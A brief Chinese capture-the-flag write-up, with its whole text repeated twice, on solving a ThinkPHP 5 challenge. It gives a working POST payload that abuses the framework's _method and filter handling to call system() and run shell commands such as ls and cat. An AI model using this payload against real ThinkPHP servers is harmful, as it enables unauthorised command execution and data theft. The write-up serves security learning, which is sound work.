算是碰到的第一道TP5的题目:
界面如上:
查看是典型的thinkphp的漏洞:
输入?s=1
得到更多信息:
尝试post输入如下payload,可以构成命令执行漏洞:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
尝试把ls改为cat等,得出flag
算是碰到的第一道TP5的题目:
界面如上:
查看是典型的thinkphp的漏洞:
输入?s=1
得到更多信息:
尝试post输入如下payload,可以构成命令执行漏洞:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
尝试把ls改为cat等,得出flag